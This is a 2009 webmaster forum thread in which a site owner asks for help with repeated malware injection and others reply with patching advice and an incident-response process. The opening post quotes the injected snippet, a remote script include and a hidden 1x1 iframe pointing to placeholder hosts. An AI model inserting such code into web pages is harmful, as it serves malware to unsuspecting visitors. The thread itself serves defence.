homepage Welcome to WebmasterWorld Guest from 54.234.147.84
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Pubcon Platinum Sponsor 2014
Home / Forums Index / Code, Content, and Presentation / HTML
Forum Library, Charter, Moderators: incrediBILL

HTML Forum

    
Infected site - need help!
by iframe
Schism




msg:3897596
 9:06 am on Apr 22, 2009 (gmt 0)

Hi, I got a big problem with my site which was infected couple of times. My site was infected with milicious code


<!-- ad --><script language=javascript src="http://example.com/show.js"></script><!-- /ad -->
<iframe src="http://example.net/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

I scanned my computer (with Kaspersky) i got no problems with viruses, I changed my ftp password and no results. Even though I deleted this code, after few days problem re-appears, does anybody got similar issue? Maybe you guys know the solution for this. I read also article about it, but still no solution.

Schism.

[edited by: tedster at 8:22 pm (utc) on April 22, 2009]
[edit reason] switch to example.com [/edit]

 

tedster




msg:3898036
 8:36 pm on Apr 22, 2009 (gmt 0)

Hello Schism, and welcome to the forums.

The steps you took would stop the problem if it originates on your local computer. I think it's more likely that the malicious code is being injected directly on your server. It's very important these days to keep all your server applications updated with the most recent patches and software versions.

I know that tech support at many web hosts would like to blame these hacks on poor password security - but in my experience, that's not the core problem. The core problem is using unpatched versions of server applications. Once a common program has been in use for a while, the "dark forces" WILL find security loopholes they can use to hack in.

Schism




msg:3898330
 6:37 am on Apr 23, 2009 (gmt 0)

Thanks for reply (and editing ;) Tedster.
I scanned my PC to avoid uploading infected files on the server.
The problem is also that, the issue appears on the page which is not application/cms/cmr etc. It's just simple html + few elements in php and a little bit javascript, but nothing fancy ;).
I also think that the milicious code is injected directly on the server. But still no solution :\

neil665




msg:3898347
 7:13 am on Apr 23, 2009 (gmt 0)

Similar malicious code has been added to my home
page recently, this has happened a few times
and the code varies each time it has been added.

Have changed my password and will wait to see
what happens in the future.

Regards

Neil

rodeorose




msg:3898358
 7:27 am on Apr 23, 2009 (gmt 0)

Hi there- what's the best way of picking up malicious code like that? Is Kaspersky enough or should I be doing more? tnx!

Schism




msg:3898551
 12:11 pm on Apr 23, 2009 (gmt 0)

@neil665

I've changed passwords too, but that didn't help.

tedster




msg:3898889
 6:55 pm on Apr 23, 2009 (gmt 0)

There's a lot of detail about dealing with different kinds of server hacks in our Google Search forum:

How Hacked Servers Can Hurt Your Traffic [webmasterworld.com]

swa66




msg:3899125
 11:52 pm on Apr 23, 2009 (gmt 0)

Changing your password is unlikely to help if your server is somehow vulnerable.

Security staff usually has a six step response in place for dealing with security incidents:

1. Prepare

To late now for some of you, but there is a load to do to both avoid the problems and to prepare what you do when you have an incident.

2. Identification and Detection

Chain of custody starts here. Assigning leadership to the response is also doen here as is coordination.

[3]3. Containment[/b]

Make sure it doesn't get worse.

Thing is once an hacker can change files on a web server, the game is almost over. Either they got access to a database (e.g. via SQL injection (something you should learn about and prevent in step 1), and now the entire database can't be trusted any longer. What if they also changed something else unnoticed (even accidentally?)

or either they found another way in and you need to identify (step 2) the way they used to get in from your logs.

Decisions need to be taken here: continue vs. abort ? There's risk and benefits in both, so the risks should be evaluated.

Backup of the hacked system ?
- preserve what you still have
- preserve evidence
- ...
DO NOT overwrite older backups doing this.
(step 1: prepare for making this backup ...)

4. Eradication

Find and remove the vulnerability. Improve defenses.
Find all that went on after the initial attack, and learn from that.

5. Recovery

Yes, almost the last step: recover: reinstall systems as needed (it'd most often easy to start again than to trust something that was hacked and where you might not have found all backdoors, rootkits etc.). It removes a lingering doubt you'll always have if you don't do this.

Rebuild data to a known safe state.

Be extremely careful with any data from the backup in Step 3, but also with older backups as they too can contain problems already (don;t reintroduce the vulnerability etc.

Validation and putting back in business is part of this of course.

6. Lessons learned
Probably the most important one as you use it to feed the entire process and improve every step to do better next time. To train developers so they can code with less problems, to improve the preparedness to incidents, to improve communication, ...

Import here is that you can also learn from incidents that others have.

These steps aren't always fully sequential, but don't try to get back in business before you know what happened as it'll backfire badly in my experience.

Now I realize most of you don't manage your own servers, so your situation is more complex as you'll need to coordinate this with the provider of that service. It's entirely possible the host got whacked not due to something you did, but your neighbor or the machine itself might have introduced something that got exploited. Few hosts are going to be very open in their communication about this, but you need to involv them anyway as much as possible.

dreamcatcher




msg:3899337
 7:16 am on Apr 24, 2009 (gmt 0)

Are you on a shared server? The issue might be being caused by someone else`s website.

dc

Schism




msg:3899967
 9:04 pm on Apr 24, 2009 (gmt 0)

@dreamcatcher

No, It's not shared server. I wonder if it's not because of javascript somehow... Thanks all for replies! I already did backup and improved security issues on my website. Now I'm waiting what will happen. I will also reply any results here :)

edit: I also wonder if Is possible (in your opinion guys) that the injection of milicious code could happened because of Google Analytics, since I've installed It the problem somehow appeared. I just don't know if I can connect somehow these two facts.

[edited by: Schism at 9:09 pm (utc) on April 24, 2009]

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / HTML
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Home ¦ Free Tools ¦ Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About ¦ Library ¦ Newsletter
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved